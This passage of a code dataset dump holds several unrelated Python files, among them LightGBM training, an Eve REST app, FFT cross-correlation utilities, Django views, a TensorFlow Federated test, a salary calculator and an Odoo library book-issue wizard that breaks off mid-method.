'max_depth': 7,\n 'max_bin': 255,\n 'lambda_l1': 1.5464112458912599e-06,\n 'lambda_l2': 5.346737781503549e-06,\n 'num_leaves': 140,\n 
'feature_fraction': 0.8534057661739842,\n 'bagging_fraction': 0.9376615592819334,\n 'bagging_freq': 1,\n 'min_child_samples': 72\n }\n\n\n# Training settings\nFOLD_NUM = 5\nfold_seed = 7\nfolds = StratifiedKFold(n_splits=FOLD_NUM, shuffle=True, random_state=fold_seed)\n# Fitting\nret = lgb.cv(params=lgbm_params,\n train_set=lgb_train,\n folds=folds,\n num_boost_round=200,\n verbose_eval = 10,\n early_stopping_rounds=50,\n callbacks=callbacks,\n)\n\n# Retrieving booster and training information.\nproxy = extraction_cb.boosters_proxy\nboosters = extraction_cb.raw_boosters\nbest_iteration = extraction_cb.best_iteration\n\nwith open(booster_name, \"wb\") as f:\n pickle.dump(boosters, f)\n\nprint(\"saved:\", booster_name)\n","sub_path":"scripts/gen_first_model_false_positive_detector.py","file_name":"gen_first_model_false_positive_detector.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"439865292","text":"from distutils.core import setup, Extension\n\nimport os.path\nimport sys\n\n\ncmatcher = Extension(\n 'cmatcher', sources=['cmatcher.c'],\n libraries=[], include_dirs=['../request'],\n library_dirs=[], extra_link_args=[],\n extra_compile_args=[])\n\nsetup(\n name='cmatcher', version='1.0', description='',\n ext_modules=[cmatcher])\n","sub_path":"evolution/evolution_017/router/build_cmatcher.py","file_name":"build_cmatcher.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"309513652","text":"import os\nfrom eve import Eve\nfrom src.validators.uuidv4 import UUIDValidator\nfrom src.encoders.encoder import Encoder\nfrom eve_auth_jwt import JWTAuth\n\n\n# Heroku support: bind to PORT if defined, otherwise default to 5000.\nif 'PORT' in os.environ:\n port = int(os.environ.get('PORT'))\n # use '0.0.0.0' to ensure your REST API is reachable from all your\n # network (and not only your computer).\n host = '0.0.0.0'\nelse:\n port = 5000\n host = '127.0.0.1'\n\napp = Eve(\n auth=JWTAuth,\n json_encoder=Encoder,\n validator=UUIDValidator)\n\n\nif __name__ == '__main__':\n app.run(host=host, port=port)","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"31345914","text":"import zmq\nfrom amonpy.config import config\n\nclass ZeroMQHandler():\n def __init__(self, socktype=zmq.DEALER):\n self.ctx = zmq.Context.instance()\n self.socket = zmq.Socket(self.ctx, socktype)\n self.socket.setsockopt(zmq.LINGER, 100)\n # As there is no high water mark set - we don't really need this\n # Additionally, its not possible to set location of these yet\n # https://zeromq.jira.com/browse/LIBZMQ-410\n #self.socket.setsockopt(zmq.SWAP, 25000000) # 25MB disk swap\n \n address = \"tcp://{0}\".format(config.address)\n self.socket.connect(address)\n\n def close(self):\n self.socket.close()\n\n def post(self, data, type=None):\n data = {\"type\": type, \"content\" : data}\n if config.secret_key:\n data['secret_key'] = config.secret_key\n \n self.socket.send_json(data, zmq.NOBLOCK)\n\nzeromq_handler = ZeroMQHandler()\n\n","sub_path":"amonpy/protocols/zeromq.py","file_name":"zeromq.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"279942400","text":"\ndef next_regular(target):\n r\"\"\"Copied from 
scipy.signal.fftconvolve\n Find the next regular number greater than or equal to target.\n Regular numbers are composites of the prime factors 2, 3, and 5.\n Also known as 5-smooth numbers or Hamming numbers, these are the optimal\n size for inputs to FFTPACK.\n Target must be a positive integer.\n \"\"\"\n if target <= 6:\n return target\n\n # Quickly check if it's already a power of 2\n if not (target & (target - 1)):\n return target\n\n match = float('inf') # Anything found will be smaller\n p5 = 1\n while p5 < target:\n p35 = p5\n while p35 < target:\n # Ceiling integer division, avoiding conversion to float\n # (quotient = ceil(target / p35))\n quotient = -(-target // p35)\n\n # Quickly find next power of 2 >= quotient\n try:\n p2 = 2 ** ((quotient - 1).bit_length())\n except AttributeError:\n # Fallback for Python <2.7\n p2 = 2 ** (len(bin(quotient - 1)) - 2)\n\n n = p2 * p35\n if n == target:\n return n\n elif n < match:\n match = n\n p35 *= 3\n if p35 == target:\n return p35\n if p35 < match:\n match = p35\n p5 *= 5\n if p5 == target:\n return p5\n if p5 < match:\n match = p5\n return match\n\n\ndef cross_correlate(in1, in2, axis=0):\n r\"\"\"Cross-correlation of matrices along given axis.\n Usually used in time-correlation, one axis is enough. Don't\n use this function to calculate autocorrelation, for\n cross_correlate(in1, in1[::-1]) is on interval [-len(in1), len(in1)),\n not on [0, len(in1)), in this case, output[len(in1)-1:] is the correct\n output for in1 == in2 or in1.size == in2.size, due to `np.flip` is\n applied on in2 here. Or generally,\n ifft(fft(a, n=na+nb-1) * fft(b, n=na+nb-1).conj())[:na] ==\n np.correlate(a, b, 'full')[nb-1:] for na >= nb... See `same' and `valid' mode\n in `scipy.fft.convolve' (`_centered' function).\n\n >>> a = np.random.random(10)\n >>> b = np.random.random(10)\n >>> np.allclose(ifft(fft(a,19)*fft(b,19).conj())[:10], np.correlate(a,b,'full')[9:])\n True\n\n :param in1: np.ndarray\n :param in2: np.ndarray\n :param axis: int\n :return: np.ndarray, `full' mode of np.correlate result.\n \"\"\"\n fft = np.fft.rfft\n ifft = np.fft.irfft\n if (np.issubdtype(in1.dtype, np.complex) or\n np.issubdtype(in2.dtype, np.complex)):\n fft = np.fft.fft\n ifft = np.fft.ifft\n s1 = in1.shape[axis]\n s2 = in2.shape[axis]\n s = s1 + s2 - 1\n f = next_regular(s)\n return ifft(fft(in1, axis=axis, n=f) *\n fft(np.flip(in2, axis=axis).conj(), axis=axis, n=f),\n axis=axis, n=f)[:s]\n\nfrom ._mat_ac import vec_ac\nfrom ._mat_ac import mat_ac\nimport numpy as np\n","sub_path":"yamddpp/TimeCorrelation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"511268674","text":"from django.views.decorators.csrf import csrf_exempt\nfrom .models import *\nfrom django.contrib.auth import login, authenticate\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.views import LoginView , LogoutView\nfrom django.contrib.auth import login as auth_login\nfrom .form import *\nfrom django.utils import timezone\n\n\n# Create your views here.\n\n\ndef home(request):\n return render(request,'base.html')\n\n\ndef index(request):\n return render(request,'index.html')\n\n\ndef blockchain(request):\n return render(request,'new.html')\n\n\ndef employee(request):\n obj=Employee.objects.all()\n myform=NewEmp()\n return 
render(request,'employee.html',{'obj':obj},{'myform':NewEmp})\n\n\ndef department(request):\n dept=Department.objects.all()\n return render(request,'department.html',{'dept':dept})\n\n\n@login_required\ndef signup(request):\n if request.method=='POST':\n form =signUpForm(request.POST)\n if form.is_valid():\n user = form.save()\n auth_login(request,user)\n return redirect('home')\n else :\n form = signUpForm()\n return render (request,'signup.html',{'form':form})\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"company/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"383707379","text":"# Copyright 2020, The TensorFlow Federated Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom absl.testing import absltest\nfrom jax.lib.xla_bridge import xla_client\nimport numpy as np\n\nfrom google.protobuf import any_pb2\nfrom tensorflow_federated.experimental.python.core.impl.utils import xla_serialization\nfrom tensorflow_federated.proto.v0 import computation_pb2 as pb\nfrom tensorflow_federated.python.core.api import computation_types\nfrom tensorflow_federated.python.core.impl.types import type_serialization\n\n\ndef _make_test_xla_comp():\n builder = xla_client.XlaBuilder('comp')\n xla_client.ops.Constant(builder, np.int32(10))\n return builder.build()\n\n\nclass XlaUtilsTest(absltest.TestCase):\n\n def test_pack_xla_computation(self):\n xla_comp = _make_test_xla_comp()\n any_pb = xla_serialization.pack_xla_computation(xla_comp)\n self.assertEqual(type(any_pb), any_pb2.Any)\n\n def test_pack_unpack_xla_computation_roundtrip(self):\n xla_comp = _make_test_xla_comp()\n any_pb = xla_serialization.pack_xla_computation(xla_comp)\n new_comp = xla_serialization.unpack_xla_computation(any_pb)\n self.assertEqual(new_comp.as_hlo_text(), xla_comp.as_hlo_text())\n\n def test_create_xla_tff_computation(self):\n xla_comp = _make_test_xla_comp()\n comp_pb = xla_serialization.create_xla_tff_computation(\n xla_comp, computation_types.FunctionType(None, np.int32))\n self.assertIsInstance(comp_pb, pb.Computation)\n self.assertEqual(comp_pb.WhichOneof('computation'), 'xla')\n type_spec = type_serialization.deserialize_type(comp_pb.type)\n self.assertEqual(str(type_spec), '( -> int32)')\n xla_comp = xla_serialization.unpack_xla_computation(comp_pb.xla.hlo_module)\n self.assertIn('ROOT constant.1 = s32[] constant(10)',\n xla_comp.as_hlo_text())\n self.assertEqual(str(comp_pb.xla.parameter), '')\n self.assertEqual(str(comp_pb.xla.result), 'tensor {\\n' ' index: 0\\n' '}\\n')\n\n\nif __name__ == '__main__':\n absltest.main()\n","sub_path":"tensorflow_federated/experimental/python/core/impl/utils/xla_serialization_test.py","file_name":"xla_serialization_test.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"420356339","text":"import os\nimport inspect\ndir_path = 
os.path.dirname(os.path.realpath(inspect.getfile(lambda: None)))\nauto_buildnumber_path = os.path.join(dir_path, \"auto_buildnumber\") # https://github.com/JackGruber/auto_buildnumber\n\nprint(\"\")\ntry:\n import sys\n sys.path.insert(0, auto_buildnumber_path)\n import versioning\n print(\"auto versioning\")\n versioning.UpdateVersionFile(\"include/version.h\", \"DEFINEHEADER\", False, \"include/version_build.h\")\nexcept:\n print(\"No auto versioning\")\nprint(\"\")","sub_path":"tools/platformio_versioning.py","file_name":"platformio_versioning.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"546459483","text":"import requests\nimport json,csv\nimport random,time\ndef parseData(vehicleNo,weightState,consignId):\n url1 = 'http://localhost:8080/a/gateconsign/consign/checkConsignByWeight?vehicleNo={}'.format(vehicleNo)\n res1 = requests.get(url1)\n d=dict(json.loads(res1.text))\n print(d.get('success'),d.get('msg'))\n if d.get(\"success\"):\n if weightState == '0':\n #一次过磅\n zl = random.randint(80000,120000)\n print('开始一次过磅重量:',zl)\n url2 = 'http://localhost:8080/a/weight/weight/saveweightConsign?id={}&zl={}'.format(consignId,zl)\n ret=requests.get(url2)\n print(ret.text)\n else:\n #二次过磅\n zl = random.randint(25000,30000)\n print('开始二次过磅重量:',zl)\n url2 = 'http://localhost:8080/a/weight/weight/updateweightConsign?id={}&zl={}'.format(consignId,zl)\n ret = requests.get(url2)\n print(ret.text)\n\ndef parseCsv(filePath):\n file = open(filePath,encoding='utf8')\n lines = csv.reader(file)\n for line in lines:\n vehicleNo = line[22]\n weightState = line[36]\n consignId = line[2]\n print(vehicleNo,'---',weightState,'---',consignId)\n parseData(vehicleNo,weightState,consignId)\n time.sleep(1)\nif __name__=='__main__':\n filepath = r\"C:\\Users\\user\\Desktop\\csv\\123.csv\"\n parseCsv(filepath)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"283909987","text":"import numpy as np\nimport os\n\nclass SpkRTTM(object):\n ''' Store message from RTTM file '''\n def __init__(self):\n self.spkid = set()\n self.vad_pair = {}\n self.label = {}\n\n # 填充说话人id、vad信息\n def append(self, line):\n items = line.strip().split()\n start = int(float(items[3])*100)\n end = int(float(items[3])*100 + float(items[4])*100)\n id = items[1] + '-' + items[7]\n if id not in self.spkid:\n self.spkid.add(id)\n self.vad_pair[id] = []\n self.vad_pair[id].append([start, end])\n\n # 将vad的(start, end)转化为0/1编码\n def vad2label(self):\n for id in self.spkid:\n length = max(np.array(self.vad_pair[id])[:, 1]) + 200 # additional 2s\n self.label[id] = np.zeros(length)\n for start, end in self.vad_pair[id]:\n self.label[id][start:end] = 1\n\n # 返回(start, end)时段内的说话人id\n def get_id(self, start, end):\n spkid = ''\n max_dur = 0\n sum_dur = 0\n for id in self.spkid:\n dur = sum(self.label[id][start:end])\n sum_dur += dur\n if(max_dur < dur):\n max_dur = dur\n spkid = id\n purity = max_dur/sum_dur\n return spkid, purity\n\n\nclass XvecSegments(object):\n def __init__(self):\n self.segments = []\n \n def append(self, seg_line, scp_line):\n _, _, start, end = seg_line.strip().split()\n start = int(float(start)*100)\n end = int(float(end)*100)\n location = scp_line.split()[1]\n self.segments.append([start, end, location])\n \n def rmoverlap(self):\n for i in range(len(self.segments)-1):\n end = 
self.segments[i][1]\n next_start = self.segments[i+1][0]\n if(end > next_start):\n self.segments[i][1] = self.segments[i+1][0] = (end + next_start)//2\n\n\ndatadirs = ['data/callhome1/', 'data/callhome2/']\nexpdirs = ['exp/xvector_nnet_1a/xvectors_callhome1/', 'exp/xvector_nnet_1a/xvectors_callhome2/']\n\nfor datadir, expdir in zip(datadirs, expdirs):\n # 读取fullref.rttm并构造SpkRTTM类,\n # 当输入(start, end),调用get_id返回时段内的说话人id\n spkref = {}\n with open(datadir + 'fullref.rttm') as ref_file:\n for line in ref_file.readlines():\n name = line.strip().split(' ')[1]\n if name not in spkref.keys():\n spkref[name] = SpkRTTM()\n spkref[name].append(line)\n for name in spkref.keys():\n spkref[name].vad2label()\n\n spkseg = {}\n with open(expdir + 'segments') as seg_file, open(expdir + 'xvector.scp') as xvec_scp:\n for seg_line, scp_line in zip(seg_file.readlines(), xvec_scp.readlines()):\n seg1, name, _, _ = seg_line.strip().split()\n seg2 = scp_line.strip().split()[0]\n assert(seg1 == seg2)\n if name not in spkseg.keys():\n spkseg[name] = XvecSegments()\n spkseg[name].append(seg_line, scp_line)\n for name in spkseg.keys():\n spkseg[name].rmoverlap()\n\n\n with open(datadir + 'xvector.scp', 'w') as xvec_wfile, open(datadir + 'hardref.rttm', 'w') as hardref_wfile:\n for name in spkref.keys():\n if name not in spkseg.keys():\n print('Miss {}'.format(name))\n continue\n for start, end, location in spkseg[name].segments:\n id, purity = spkref[name].get_id(start, end)\n xvec_wfile.write('{} {}\\n'.format(id, location))\n dur = float(end - start)/100\n start = float(start)/100\n hardref_wfile.write('SPEAKER {} 0 {} {} {} \\n'.format(\n name, start, dur, id\n ))\n os.system('src2/md-eval.pl -1 -c 0.25 -r {0}/fullref.rttm -s {0}/hardref.rttm 2>src2/.log > {0}/DER.txt'.format(datadir))","sub_path":"prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"341779982","text":"#!/usr/bin/env python3\n\nimport pyaudio\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\n\ndef time_axis(arr):\n return np.array(range(len(arr)))/44100\n\n\ndef plot(arr):\n fig, ax = plt.subplots()\n fig.text(0.5, 0.04, 'Zeit (s)', ha='center', va='center')\n fig.text(0.06, 0.5, 'Amplitude (V*)', ha='center', va='center', rotation='vertical')\n ax.plot(time_axis(arr), arr)\n plt.show()\n\n\nFORMAT = pyaudio.paInt16\nSAMPLEFREQ = 44100\nFRAMESIZE = 1024\nNOFFRAMES = 220\n\np = pyaudio.PyAudio()\nprint('running')\nstream = p.open(format=FORMAT, channels=1, rate=SAMPLEFREQ, input=True, frames_per_buffer=FRAMESIZE)\ndata = stream.read(NOFFRAMES * FRAMESIZE)\ndecoded = np.fromstring(data, 'Int16') / ((2**15)/2-1)\nstream.stop_stream()\nstream.close()\np.terminate()\nprint('done')\nprint(len(decoded))\n\nstart = np.argmax(np.abs(decoded) > 0.07) - 1024\nend = start + 44100\ntriggered = decoded[start:end]\ntriggered = np.concatenate((triggered, [0]*(44100 - end - start)))\n\nnp.savetxt(\"rechts_2_\" + str(int(time.time())) + \".csv\", triggered)\n\n\nplot(decoded)\nplot(triggered)\n#plot(decoded)\n","sub_path":"Aufgabe4/Code/soundrecord.py","file_name":"soundrecord.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"334394378","text":"from __future__ import (absolute_import, division, print_function)\n\nimport os\n\nimport numpy as np\n\nGRAD_TOL = 1e-1\nRES_TOL = 1e-8\n\n\nclass 
FittingResult(object):\n \"\"\"\n Minimal definition of a class to hold results from a\n fitting problem test.\n \"\"\"\n\n def __init__(self, options=None, problem=None, fit_status=None,\n chi_sq=None, params=None, runtime=None, minimizer=None,\n ini_function_params=None, fin_function_params=None,\n error_flag=None):\n\n self.options = options\n self.problem = problem\n self.fit_status = fit_status\n self.params = params\n\n self.chi_sq = chi_sq\n self._min_chi_sq = None\n\n # Time it took to run the Fit algorithm\n self.runtime = runtime\n self._min_runtime = None\n\n # Minimizer for a certain problem and its function definition\n self.minimizer = minimizer\n self.ini_function_params = ini_function_params\n self.fin_function_params = fin_function_params\n\n # Controller error handling\n self.error_flag = error_flag\n\n self.value = None\n self.norm_value = None\n\n self.colour = None\n self.colour_runtime = None\n self.colour_acc = None\n\n # Defines the type of table to be produced\n self._table_type = None\n self.output_string_type = {\"abs\": '{:.4g}',\n \"rel\": '{:.4g}',\n \"both\": '{0:.4g} ({1:.4g})'}\n\n # Paths to various output files\n self.support_page_link = ''\n self.start_figure_link = ''\n self.figure_link = ''\n\n # Links will be displayed relative to this dir\n self.relative_dir = os.path.abspath(os.sep)\n\n # Error written to support page if plotting failed\n # Default can be overwritten with more information\n self.figure_error = 'Plotting Failed'\n\n # Print with html tag or not\n self.html_print = False\n\n # Marker to indicate this is the best fit for the problem\n # Used for the support pages\n self.is_best_fit = False\n\n # Boolean that checks return true or false depending whether\n # norm(J^T r), norm(J^T r)/norm(r) and/or norm(r) are smaller\n # than a set tolerance\n self._local_min = None\n\n @property\n def local_min(self):\n \"\"\"\n Getter for local_min. 
This indicates if the result is a\n        local minimum\n\n        :return: Whether the result is a minimum or not\n        :rtype: bool\n        \"\"\"\n        if self.params is not None:\n            r = self.problem.eval_r(self.params)\n            min_test = np.matmul(self.problem.eval_j(self.params).T, r)\n            norm_r = np.linalg.norm(r)\n            norm_min_test = np.linalg.norm(min_test)\n            self.norm_rel = norm_min_test / norm_r\n            if norm_r <= RES_TOL or norm_min_test <= GRAD_TOL \\\n                    or self.norm_rel <= GRAD_TOL:\n                self._local_min = \"True\"\n            else:\n                self._local_min = \"False\"\n        else:\n            self._local_min = \"False\"\n            self.norm_rel = np.inf\n        return self._local_min\n\n    @local_min.setter\n    def local_min(self, value):\n        self._local_min = value\n\n    def __str__(self):\n        \"\"\"\n        The string representation of this is used to create the tables.\n        This creates a correct representation for the table that has been set.\n\n        :return: Table dependent string representation\n        :rtype: str\n        \"\"\"\n        if self.table_type is not None:\n            output = self.table_output\n            if self.html_print:\n                link = os.path.relpath(path=self.support_page_link,\n                                       start=self.relative_dir)\n                if self.error_flag != 0:\n                    output += \"<sup>{}</sup>\".format(self.error_flag)\n                output = '<a href=\"{0}\">{1}</a>'.format(link, output)\n            elif self.error_flag != 0:\n                output += \"[{}]\".format(self.error_flag)\n        else:\n            output = 'Fitting problem class: minimizer = {0}'.format(\n                self.minimizer)\n        return output\n\n    @property\n    def table_type(self):\n        return self._table_type\n\n    @table_type.setter\n    def table_type(self, value):\n        \"\"\"\n        Switch table types and setup needed values for creating string output\n\n        :param value: The table to set up for\n        :type value: str\n        \"\"\"\n        self._table_type = value\n        comp_mode = self.options.comparison_mode\n        result_template = self.output_string_type[comp_mode]\n\n        if value == \"runtime\":\n            abs_value = [self.runtime]\n            rel_value = [self.norm_runtime]\n            self.colour = self.colour_runtime\n        elif value == \"acc\":\n            abs_value = [self.chi_sq]\n            rel_value = [self.norm_acc]\n            self.colour = self.colour_acc\n        elif value == \"compare\":\n            abs_value = [self.chi_sq, self.runtime]\n            rel_value = [self.norm_acc, self.norm_runtime]\n            self.colour = [self.colour_acc, self.colour_runtime]\n\n        if value == \"local_min\":\n            output = self.local_min\n            self.table_output = output + \" (\" +\\\n                self.output_string_type['abs'].format(self.norm_rel) + \")\"\n            colour = [c[1] for c in self.options.colour_scale]\n            self.colour = colour[0] if output == \"True\" else colour[-1]\n        else:\n            if comp_mode == \"abs\":\n                self.table_output = \\\n                    '<br>'.join([result_template.format(v) for v in abs_value])\n            elif comp_mode == \"rel\":\n                self.table_output = \\\n                    '<br>'.join([result_template.format(v) for v in rel_value])\n            elif comp_mode == \"both\":\n                self.table_output = \\\n                    '<br>
'.join([result_template.format(v1, v2)\n for v1, v2 in zip(abs_value, rel_value)])\n\n def set_colour_scale(self):\n \"\"\"\n Utility function set colour rendering for html tables\n \"\"\"\n colour_scale = self.options.colour_scale\n colour_bounds = [colour[0] for colour in colour_scale]\n # prepending 0 value for colour bound\n colour_bounds = [0] + colour_bounds\n html_colours = [colour[1] for colour in colour_scale]\n self.colour_runtime = colour_scale[-1]\n self.colour_acc = colour_scale[-1]\n for i in range(len(colour_bounds) - 1):\n if colour_bounds[i] < self.norm_runtime <= colour_bounds[i + 1]:\n self.colour_runtime = html_colours[i]\n if colour_bounds[i] < self.norm_acc <= colour_bounds[i + 1]:\n self.colour_acc = html_colours[i]\n\n @property\n def min_chi_sq(self):\n return self._min_chi_sq\n\n @min_chi_sq.setter\n def min_chi_sq(self, value):\n \"\"\"\n Stores the min chi squared and updates the normalised value\n\n :param value: New value for min_chi_sq\n :type value: float\n \"\"\"\n self._min_chi_sq = value\n if not self.chi_sq > 0:\n self.chi_sq = np.inf\n self.norm_acc = self.chi_sq / self.min_chi_sq\n\n @property\n def min_runtime(self):\n return self._min_runtime\n\n @min_runtime.setter\n def min_runtime(self, value):\n \"\"\"\n Stores the min runtime and updates the normalised value\n\n :param value: New value for min_runtime\n :type value: float\n \"\"\"\n self._min_runtime = value\n self.norm_runtime = self.runtime / self.min_runtime\n","sub_path":"fitbenchmarking/utils/fitbm_result.py","file_name":"fitbm_result.py","file_ext":"py","file_size_in_byte":7658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"423272640","text":"def createdict():\n no = sum(1 for line in open('example graph.txt', 'r'))\n f=open('example graph.txt','r')\n D=dict()\n for i in range (1,no+1):\n L=f.readline()\n\n D[(L[0],L[2])]=int(L[4]+L[5])\n f.close()\n return D\n\ndef AdjacencyLists(s):\n f=open('example graph.txt','r')\n A=[]\n for i in range(1,9):\n L=f.readline()\n if s==L[0] :\n A.append(L[2])\n if s==L[2]:\n A.append(L[0])\n return A\n f.close() \n\n\ndef visited():\n f=open('example graph.txt','r')\n A=[]\n no = sum(1 for line in open('example graph.txt', 'r'))\n for i in range (1,no+1):\n L=f.readline()\n\n if L[0] not in A:\n A.append(L[0])\n if L[2] not in A:\n A.append(L[2])\n return(A)\n f.close()\n\n\n\n\ndef graph():\n g=dict()\n nodes=visited()\n for v in nodes :\n g[v]=set(AdjacencyLists(v))\n print(g)\n\n\ndef dfs_paths(graph, start_node, end_node):\n stack = [(start_node, [start_node])]\n while stack:\n (vertex, path) = stack.pop()\n for next in graph[vertex] - set(path):\n if next == end_node:\n yield path + [next]\n else:\n stack.append((next, path + [next]))\n return stack\n \n \n \ndef distpath(path):\n #Create matrix of distances\n D=createdict()\n L=[]\n for i in range(0,len(path)-1):\n L.append(D[(path[i],path[i+1])])\n\n return L\n\ndef findshortest(paths,b):\n L=[]\n for path in paths:\n L.append(sum(distpath(path))*b+(distpath(path)[0])*(1-b))\n\n x=L.index(min(L))\n return paths[x]\n \n\n\ndef psychology(s,t,b):\n M=[s]\n while t not in M:\n paths=AllSimplePaths(s,t)\n path=findshortest(paths,b)\n s=path[1]\n M.append(s)\n\n print(M,sum(distpath(M)))\n","sub_path":"present_bias.py","file_name":"present_bias.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"110625806","text":" # # vd: Bang luong (part time): 
no.   name   level   hours worked \n#      1     H       22      14 \n#      2     L       90      12 \n#      3     T       80      12 \n# 1> describe the salary table in code.\n# 2> work out how much money each person gets at the end of the month\nfrom collections import OrderedDict\n\nr1 = {\n    \"#\" : 1,\n    \"name\" : \"Huy\",\n    \"level\" : 25,\n    \"hour\" : 14,\n}\nr2 = {\n    \"#\" : 2,\n    \"name\" : \"Hoa\",\n    \"level\" : 20,\n    \"hour\" : 7,\n}\nr3 = {\n    \"#\" : 3,\n    \"name\" : \"Tam\",\n    \"level\" : 15,\n    \"hour\" : 20,\n}\n\nsalary_list = [r1, r2, r3]\ntotal_wage = 0\nwage_list =[]\n# salary = salary_list[1]\n\nfor salary in salary_list:\n    name = salary[\"name\"]\n    hour = salary[\"hour\"]\n    level = salary[\"level\"]\n    wage_info = OrderedDict({\n        \"name\" : name,\n        \"wage\" : hour * level,\n    })\n    wage_list.append(wage_info)\n    wage = hour * level\n    total_wage += wage\n\n    print(name, \"'s wage: \", wage)\nprint(\"Total wage: \", total_wage)\nprint(wage_list)\n\n\nimport pyexcel\n\npyexcel.save_as(records=wage_list,dest_file_name =\"wage_output.xlsx\")\n#print(salary_list)\n\n# for x in salary_list:\n#     print(x)\n","sub_path":"Session04/salary.py","file_name":"salary.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"618927940","text":"# -*- coding: utf-8 -*-\n###############################################################################\n#\n#    Tech-Receptives Solutions Pvt. Ltd.\n#    Copyright (C) 2009-TODAY Tech-Receptives().\n#\n#    This program is free software: you can redistribute it and/or modify\n#    it under the terms of the GNU Lesser General Public License as\n#    published by the Free Software Foundation, either version 3 of the\n#    License, or (at your option) any later version.\n#\n#    This program is distributed in the hope that it will be useful,\n#    but WITHOUT ANY WARRANTY; without even the implied warranty of\n#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#    GNU Lesser General Public License for more details.\n#\n#    You should have received a copy of the GNU Lesser General Public License\n#    along with this program. 
If not, see .\n#\n###############################################################################\n\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import except_orm,Warning\n\nfrom ..models import book_unit\nimport datetime\n\n\nclass IssueBook(models.TransientModel):\n\n \"\"\" Issue Book \"\"\"\n _name = 'issue.book'\n\n book_id = fields.Many2one('op.book', 'Book', required=True)\n book_unit_id = fields.Many2one('op.book.unit', 'Book Unit', required=True)\n isbn = fields.Char('ISBN13 Code', size=16)\n ean = fields.Char('EAN10 Code', size=16)\n barcode = fields.Char('Barcode', size=20)\n type = fields.Selection(\n [('student', 'Student'), ('faculty', 'Faculty')],\n 'Type', required=True)\n #student_id = fields.Many2one('op.student', 'Student')\n student_id = fields.Many2one('res.partner', 'Student')\n class_id = fields.Many2one('course',string=\"Class\")\n student_section_id = fields.Many2one('section', 'Admitted section')\n faculty_id = fields.Many2one('op.faculty', 'Faculty')\n library_card_id = fields.Many2one(\n 'op.library.card', 'Library Card', required=True)\n issued_date = fields.Date('Issued Date', required=True, default=lambda self: fields.Date.today())\n return_date = fields.Date('Return Date', required=True)\n\n @api.onchange('library_card_id')\n def onchange_library_card_id(self):\n self.type = self.library_card_id.type\n if self.type == 'student':\n self.student_id = self.library_card_id.student_id.id\n self.return_date = datetime.datetime.now() + datetime.timedelta(self.library_card_id.return_days)\n self.faculty_id = self.library_card_id.faculty_id.id\n\n @api.onchange('book_id')\n def onchange_book_id(self):\n self.isbn = self.book_id.isbn\n self.ean = self.book_id.ean\n\n @api.onchange('book_unit_id')\n def onchange_book_unit_id(self):\n self.barcode = self.book_unit_id.barcode\n\n\n @api.onchange('student_id')\n def onchange_student_id(self):\n lib_card_obj= self.env['op.library.card']\n self.class_id = self.student_id.class_id.id\n self.student_section_id = self.student_id.student_section_id.id\n self.library_card_id = self.student_id.library_card_id.id\n if not self.student_id.library_card_id and self.type == 'student':\n warning = {\n 'title': _('Warning!'),\n 'message': _('No Library card found for this student!'),\n }\n return {'warning': warning}\n if self.type and not lib_card_obj.sudo().search([(\"student_id\",\"=\",self.student_id.id)]):\n warning = {\n 'title': _('Warning!'),\n 'message': _('Library card deactivated this student!'),\n }\n return {'warning': warning}\n\n @api.onchange('faculty_id')\n def onchange_faculty_id(self):\n \n lib_card_obj= self.env['op.library.card']\n self.library_card_id = self.faculty_id.library_card_id.id\n if not self.library_card_id and self.type == 'faculty':\n warning = {\n 'title': _('Warning!'),\n 'message': _('No Library card found for this faculty!'),\n }\n if self.type and not lib_card_obj.sudo().search([(\"faculty_id\",\"=\",self.faculty_id.id)]):\n warning = {\n 'title': _('Warning!'),\n 'message': _('Library card deactivated this faculty!'),\n }\n return {'warning': warning}\n\n\n\n @api.one\n def check_max_issue(self, student_id,faculty_id, library_card_id):\n if 